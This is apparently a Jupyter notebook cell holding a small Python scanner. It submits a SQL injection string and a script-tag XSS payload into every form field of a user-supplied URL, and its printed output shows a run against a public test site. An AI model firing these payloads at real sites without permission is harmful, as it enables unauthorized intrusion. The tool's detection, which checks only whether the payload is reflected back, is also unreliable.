In [4]:
import requests
from bs4 import BeautifulSoup
import urllib.parse

# 🧪 Payloads
sql_payload = "' OR '1'='1"
xss_payload = "<script>alert('XSS')</script>"

# 📥 Get all forms from the web page
def get_all_forms(url):
    try:
        response = requests.get(url, timeout=5)
        soup = BeautifulSoup(response.content, "html.parser")
        return soup.find_all("form")
    except Exception as e:
        print(f"❌ Failed to fetch URL: {e}")
        return []

# 📋 Extract form details
def get_form_details(form):
    details = {}
    action = form.attrs.get("action")
    method = form.attrs.get("method", "get").lower()
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details

# 🚀 Submit form with payload
def submit_form(form_details, url, payload):
    target_url = urllib.parse.urljoin(url, form_details["action"])
    data = {}
    for input_field in form_details["inputs"]:
        if input_field["name"]:
            data[input_field["name"]] = payload
    try:
        if form_details["method"] == "post":
            return requests.post(target_url, data=data, timeout=5)
        else:
            return requests.get(target_url, params=data, timeout=5)
    except Exception as e:
        print(f"❌ Error submitting form: {e}")
        return None

# 🔍 Scanner
def scan_for_vulnerabilities(url):
    print(f"\n🌐 Scanning URL: {url}")
    forms = get_all_forms(url)
    print(f"🔍 Found {len(forms)} forms.")

    sql_vulnerable = []
    xss_vulnerable = []

    for i, form in enumerate(forms):
        form_details = get_form_details(form)
        print(f"\n🧾 Testing Form #{i+1}:")
        print(f"→ Action: {form_details['action']}")
        print(f"→ Method: {form_details['method']}")
        
        # Test for SQL Injection
        sql_test = submit_form(form_details, url, sql_payload)
        if sql_test and sql_payload.lower() in sql_test.text.lower():
            print("⚠️ SQL Injection vulnerability found!")
            sql_vulnerable.append(form_details)

        # Test for XSS
        xss_test = submit_form(form_details, url, xss_payload)
        if xss_test and xss_payload in xss_test.text:
            print("⚠️ XSS vulnerability found!")
            xss_vulnerable.append(form_details)

    # Summary
    print("\n🔐 Scan Summary:")
    if sql_vulnerable:
        print(f"🛑 {len(sql_vulnerable)} form(s) vulnerable to SQL Injection")
    else:
        print("✅ No SQL Injection detected.")

    if xss_vulnerable:
        print(f"🛑 {len(xss_vulnerable)} form(s) vulnerable to XSS")
    else:
        print("✅ No XSS detected.")

# 🎯 Run the tool
if __name__ == "__main__":
    target_url = input("🔗 Enter the target URL (e.g., http://testphp.vulnweb.com/): ").strip()
    scan_for_vulnerabilities(target_url)

🔗 Enter the target URL (e.g., http://testphp.vulnweb.com/):  	http://testphp.vulnweb.com



🌐 Scanning URL: http://testphp.vulnweb.com
🔍 Found 1 forms.

🧾 Testing Form #1:
→ Action: search.php?test=query
→ Method: post
⚠️ SQL Injection vulnerability found!
⚠️ XSS vulnerability found!

🔐 Scan Summary:
🛑 1 form(s) vulnerable to SQL Injection
🛑 1 form(s) vulnerable to XSS
